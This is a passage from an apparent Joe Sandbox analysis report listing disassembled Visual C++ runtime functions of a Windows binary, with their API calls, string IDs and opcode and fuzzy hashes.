                                                    • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID:
                                                    • API String ID: 2943138195-0
                                                    • Opcode ID: eee89ee1f130d0961218095a9fc0b53f7afacaf12ed75a2902502673e2e14d0a
                                                    • Instruction ID: 7e95967aec5a592ecbb8faff79da38384308d279fdf16c3fa71f1e5e8982c934
                                                    • Opcode Fuzzy Hash: eee89ee1f130d0961218095a9fc0b53f7afacaf12ed75a2902502673e2e14d0a
                                                    • Instruction Fuzzy Hash: A6616C62F14B669CFB10DBA2D8C01EC23B1BB057A8B444475EE4D2BBA9DF78D549C340
                                                    Function 00007FFE148B31A0 Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 314COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                    • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: abortterminate$Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                    • String ID: csm$csm$csm
                                                    • API String ID: 211107550-393685449
                                                    • Opcode ID: 0064667aa2bbf9281c63e2df04417489b0782d36b63c0d46c8f407a2327b119e
                                                    • Instruction ID: c7b3cba6dcbc7f4f8d3c58454e243156c5feb8ad82b9ad41c227a5c2e0256b4a
                                                    • Opcode Fuzzy Hash: 0064667aa2bbf9281c63e2df04417489b0782d36b63c0d46c8f407a2327b119e
                                                    • Instruction Fuzzy Hash: C6E1A172A08B828EE7119F6AD4C13AD7BA0FB46B68F144175EE8D57765CF38E489C700
                                                    Function 00007FFE148BBD44 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 111COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                    • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID: cli::array<$cli::pin_ptr<$std::nullptr_t$std::nullptr_t $void$void
                                                    • API String ID: 2943138195-2239912363
                                                    • Opcode ID: 4fc3578ce17063dc0d50d7b4ec0948e8f0b10801750ed5c8ab16538871d1fbeb
                                                    • Instruction ID: ca9a7969fba2207854e288ab3fa8b1223055d7c78dbf257d9e743214cbdfade1
                                                    • Opcode Fuzzy Hash: 4fc3578ce17063dc0d50d7b4ec0948e8f0b10801750ed5c8ab16538871d1fbeb
                                                    • Instruction Fuzzy Hash: AB512B62E18F958DFB218B66D8812BC77A0BB06764F884175EA4D16BB5DF7CA048C710
                                                    Function 00007FFE148B5F0A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 162COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                    • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: FileHeader$ExceptionFindInstanceRaiseTargetType
                                                    • String ID: Access violation - no RTTI data!$Attempted a typeid of nullptr pointer!$Bad dynamic_cast!$Bad read pointer - no RTTI data!
                                                    • API String ID: 1852475696-928371585
                                                    • Opcode ID: 3f5ae67d750eed0948469dee2eb461f1b185087becd2781b1c598a920b5ce485
                                                    • Instruction ID: b57a24d2ccdfb6b20954efadac5c2924b6253ab22a4b79a74826b0ef27ba8342
                                                    • Opcode Fuzzy Hash: 3f5ae67d750eed0948469dee2eb461f1b185087becd2781b1c598a920b5ce485
                                                    • Instruction Fuzzy Hash: 3151AF72A19E468AEE60DB16E8D06B96360FF46BA8F404471FA4E17775DF3CE10AC701
                                                    Function 00007FFE148BE040 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 127COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                    • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+$Name::operator+=
                                                    • String ID: {for
                                                    • API String ID: 179159573-864106941
                                                    • Opcode ID: c0b9cebf11bf4c0a15ee625392032b6eb5ef6d0d0e9f9843e3ed64e918802d57
                                                    • Instruction ID: cfcc6d688fc19d68f56250803976d1a6b3021f29633833031fc7006a3230e6b0
                                                    • Opcode Fuzzy Hash: c0b9cebf11bf4c0a15ee625392032b6eb5ef6d0d0e9f9843e3ed64e918802d57
                                                    • Instruction Fuzzy Hash: 39514772A08B85ADEB119F2AD4813F863A0FB06768F8480B1FA4C17BA5DF7CD558C350
                                                    Function 00007FFE148B68AC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 86libraryloaderCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FFE148B6A6B,?,?,00000000,00007FFE148B689C,?,?,?,?,00007FFE148B65E5), ref: 00007FFE148B692F
                                                    • GetLastError.KERNEL32(?,?,?,00007FFE148B6A6B,?,?,00000000,00007FFE148B689C,?,?,?,?,00007FFE148B65E5), ref: 00007FFE148B693D
                                                    • wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFE148B6A6B,?,?,00000000,00007FFE148B689C,?,?,?,?,00007FFE148B65E5), ref: 00007FFE148B6956
                                                    • LoadLibraryExW.KERNEL32(?,?,?,00007FFE148B6A6B,?,?,00000000,00007FFE148B689C,?,?,?,?,00007FFE148B65E5), ref: 00007FFE148B6968
                                                    • FreeLibrary.KERNEL32(?,?,?,00007FFE148B6A6B,?,?,00000000,00007FFE148B689C,?,?,?,?,00007FFE148B65E5), ref: 00007FFE148B69AE
                                                    • GetProcAddress.KERNEL32(?,?,?,00007FFE148B6A6B,?,?,00000000,00007FFE148B689C,?,?,?,?,00007FFE148B65E5), ref: 00007FFE148B69BA
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                    • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Library$Load$AddressErrorFreeLastProcwcsncmp
                                                    • String ID: api-ms-
                                                    • API String ID: 916704608-2084034818
                                                    • Opcode ID: 6b7b0d4fa722d880e64a88f355651dead124a34291e91049cf67a31c88754f30
                                                    • Instruction ID: cb45ecb275ca7d561290164fb31a6fe950104cd4a30344f57d2b61b66b9c224f
                                                    • Opcode Fuzzy Hash: 6b7b0d4fa722d880e64a88f355651dead124a34291e91049cf67a31c88754f30
                                                    • Instruction Fuzzy Hash: 0031F621B1AF42D9EE129B0398805B56394BF46BB4F594575FD2D1B3A1EE3CE0498701
                                                    Function 00007FFE148B27CC Relevance: 12.2, APIs: 8, Instructions: 150COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                    • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: abort$AdjustPointer
                                                    • String ID:
                                                    • API String ID: 1501936508-0
                                                    • Opcode ID: f536bb5bf75f83b61f2ed1a9f953b5661f0afd3f6fa50fe31fba87816ef20d26
                                                    • Instruction ID: 21902e3bcd484eb05630fe2d0762924f439020195256e786b8c6ff8884fcab2e
                                                    • Opcode Fuzzy Hash: f536bb5bf75f83b61f2ed1a9f953b5661f0afd3f6fa50fe31fba87816ef20d26
                                                    • Instruction Fuzzy Hash: 73519431E09E4389FA669B17A4C8A796794BF46FE0F0944B5FA8D0A3B5DF2CD4499300
                                                    Function 00007FFE148B25E8 Relevance: 12.1, APIs: 8, Instructions: 148COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                    • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: abort$AdjustPointer
                                                    • String ID:
                                                    • API String ID: 1501936508-0
                                                    • Opcode ID: 4133a3c8522e9ad4c59629d1c69fd9a773956bfa8f0d308a74ae217d7e4dd4b2
                                                    • Instruction ID: 5aed8259578ca98a153516f505dbeed6d7ccb5e99303d6a388db4fb2eaa5002c
                                                    • Opcode Fuzzy Hash: 4133a3c8522e9ad4c59629d1c69fd9a773956bfa8f0d308a74ae217d7e4dd4b2
                                                    • Instruction Fuzzy Hash: C851A031A0AE4289EA65DB1394CC6396390BF57FA0F0544B6FE4E067B5DF2CE44AC308
                                                    Function 00007FFE148B5520 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 132COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                    • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: FileHeader_local_unwind
                                                    • String ID: MOC$RCC$csm$csm
                                                    • API String ID: 2627209546-1441736206
                                                    • Opcode ID: f566e69653b86ea8378c92b645cec8575a9338b72885f277a4296e74010113f5
                                                    • Instruction ID: 1b2ef3f2bddac828b99073844300cfe3eecc04e4a1e8e3c0b9eb2158b60fbc08
                                                    • Opcode Fuzzy Hash: f566e69653b86ea8378c92b645cec8575a9338b72885f277a4296e74010113f5
                                                    • Instruction Fuzzy Hash: B9517E72E09A128EEB609F26908137937A0FF87BA8F544171FE4C563A5DF3CE4498A11
                                                    Function 00007FFE148BD638 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                    • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: NameName::atol
                                                    • String ID: `template-parameter$void
                                                    • API String ID: 2130343216-4057429177
                                                    • Opcode ID: de998247550e715210f86324ba9a2d53c4cebc4b024ae86fc647548c28b37640
                                                    • Instruction ID: 8b6b104415080b94a559b47a6ac77b1bc15d115994590cc0c717ca0f1aa3958f
                                                    • Opcode Fuzzy Hash: de998247550e715210f86324ba9a2d53c4cebc4b024ae86fc647548c28b37640
                                                    • Instruction Fuzzy Hash: 60412A22F08F569CFB008BA6D8912EC23B1BB067A8F941175EE4D27B65DF7CA509C741
                                                    Function 00007FFE148B8624 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 85COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                    • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                    • API String ID: 2943138195-2211150622
                                                    • Opcode ID: 474a76aaf6cc86a8b1d3d1165867f84d71bf12baca473517ea4a48996678f9db
                                                    • Instruction ID: 4b604fcb5738c9e1191917d1f4823bbec29644eba042e8cc3829017ce96405c9
                                                    • Opcode Fuzzy Hash: 474a76aaf6cc86a8b1d3d1165867f84d71bf12baca473517ea4a48996678f9db
                                                    • Instruction Fuzzy Hash: EB413872E28F568CFB018B6AD8C02AC37A0BB0A758F984175EA4D123B4DF7CA549C750
                                                    Function 00007FFE148BA248 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 83COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                    • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID: char $int $long $short $unsigned
                                                    • API String ID: 2943138195-3894466517
                                                    • Opcode ID: 4ee7ff45a7e0e2b45afe3db2621d5bae9a95249cbfdc9ddfa471e1e2039724d8
                                                    • Instruction ID: 96415c3c486c91c71b9c438131562987a143f5d9095ea2c345f375e5e2497f29
                                                    • Opcode Fuzzy Hash: 4ee7ff45a7e0e2b45afe3db2621d5bae9a95249cbfdc9ddfa471e1e2039724d8
                                                    • Instruction Fuzzy Hash: 43416C72F18F168DEB218F6AD8805BC77B0BB0A724F844175EA4C56BA8DE3DA548C710
                                                    Function 00007FFE148B62D0 Relevance: 9.1, APIs: 6, Instructions: 83stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                    • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: free$EntryInterlockedListNamePush__unmallocstrcpy_s
                                                    • String ID:
                                                    • API String ID: 3741236498-0
                                                    • Opcode ID: aecfe1721c752e9e19212834be403d09b9e2581b6ca4840f0535acf8499bb080
                                                    • Instruction ID: dd30cc095ffb5b4a261d71771aec7dd6094e8ef93a7988f207137184d6bd05a2
                                                    • Opcode Fuzzy Hash: aecfe1721c752e9e19212834be403d09b9e2581b6ca4840f0535acf8499bb080
                                                    • Instruction Fuzzy Hash: A531C422B19F5685EB158B27A9844A96390BF0EFF8B984575ED2D133A0EF3DD44AC300
                                                    Function 00007FFE148B38A8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 189COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                    • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: abort$CallEncodePointerTranslator
                                                    • String ID: MOC$RCC
                                                    • API String ID: 2889003569-2084237596
                                                    • Opcode ID: 93647179691fad2c31583b5b624f7a301f4cbf651fe46746ef26265b161a590f
                                                    • Instruction ID: b545c0b9f6eff9892efe29e395a5266efed24277aad1ca2c4a1e925f4fe90568
                                                    • Opcode Fuzzy Hash: 93647179691fad2c31583b5b624f7a301f4cbf651fe46746ef26265b161a590f
                                                    • Instruction Fuzzy Hash: 30919F73A08B818AE711CB66E4802AD7BA0F706798F14416AEF8D17B65DF38D199C700
                                                    Function 00007FFE148BBA90 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 167COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                    • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: Name::operator+
                                                    • String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
                                                    • API String ID: 2943138195-757766384
                                                    • Opcode ID: dd51cba4cb05916af9b660d2e8855c61f9d1249a1d68a44b5469808a2cb9767c
                                                    • Instruction ID: f6c1c257b680a7a915c009a60e0c8b8c7ed92f6561bb97efbc9293a2f452e5b4
                                                    • Opcode Fuzzy Hash: dd51cba4cb05916af9b660d2e8855c61f9d1249a1d68a44b5469808a2cb9767c
                                                    • Instruction Fuzzy Hash: 84715F71A08F5288FB248F26D8D15BC66A4BB067A4F8445B5EA5D03BB9DF3CE258C340
                                                    Function 00007FFE148B3690 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 145COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                    • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: abort$CallEncodePointerTranslator
                                                    • String ID: MOC$RCC
                                                    • API String ID: 2889003569-2084237596
                                                    • Opcode ID: 7ad9f89f87b67e87ef2f2f7918b4673cbfa1f5ae22a53a6e1dcb14bee6498f23
                                                    • Instruction ID: e1586dad7eea6419691190e75f0493237ba719e2752b16b247987f137b29d093
                                                    • Opcode Fuzzy Hash: 7ad9f89f87b67e87ef2f2f7918b4673cbfa1f5ae22a53a6e1dcb14bee6498f23
                                                    • Instruction Fuzzy Hash: 99614872A08B858AE724CF66D4803AD77A0FB49B98F144275EF8D17B69DF78E059C700
                                                    Function 00007FFE148B9ED0 Relevance: 7.6, APIs: 5, Instructions: 94COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                    • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: NameName::$Name::operator+
                                                    • String ID:
                                                    • API String ID: 826178784-0
                                                    • Opcode ID: 7a215f6e1ecc099ddad05745ac6fc735a17c609b89ce59e1dc00ffa76962c259
                                                    • Instruction ID: 16321694352b6b813a2529aa1e96012e3ab791f36e2f2a4f4f8f41208d2ca11b
                                                    • Opcode Fuzzy Hash: 7a215f6e1ecc099ddad05745ac6fc735a17c609b89ce59e1dc00ffa76962c259
                                                    • Instruction Fuzzy Hash: 11415B32A08E5699EB10DB62D8C05B877A4BB56BA0B9840B6FE4D537B5DF38E459C300
                                                    Function 00007FFE148B4044 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 163COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00007FFE148B6710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE148B239E), ref: 00007FFE148B671E
                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE148B41C3
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
                                                    • Associated: 00000001.00000002.1668603784.00007FFE148B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668672484.00007FFE148C1000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668697231.00007FFE148C5000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                    • Associated: 00000001.00000002.1668720877.00007FFE148C6000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffe148b0000_t8F7Ic986c.jbxd
                                                    Similarity
                                                    • API ID: abort
                                                    • String ID: $csm$csm
                                                    • API String ID: 4206212132-1512788406
                                                    • Opcode ID: 2045304a97019384742e1fa54be03ef2cb538ca31ca8d9edefceaee7868ace1c
                                                    • Instruction ID: 8eb01ae0897bd2782086f79d85a22c2c9f52c684d5f8b85f4c3a735578bd8d84
                                                    • Opcode Fuzzy Hash: 2045304a97019384742e1fa54be03ef2cb538ca31ca8d9edefceaee7868ace1c
                                                    • Instruction Fuzzy Hash: F471A232908A918AD7608F2A94C17797BA0FB06FA8F148175EF8C07BA9CB3CD459C741
                                                    Function 00007FFE148B3E1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 00007FFE148B6710: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,00007FFE148B239E), ref: 00007FFE148B671E
                                                    • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFE148B3F13
                                                    • __FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FFE148B3F23
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1668644836.00007FFE148B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE148B0000, based on PE: true
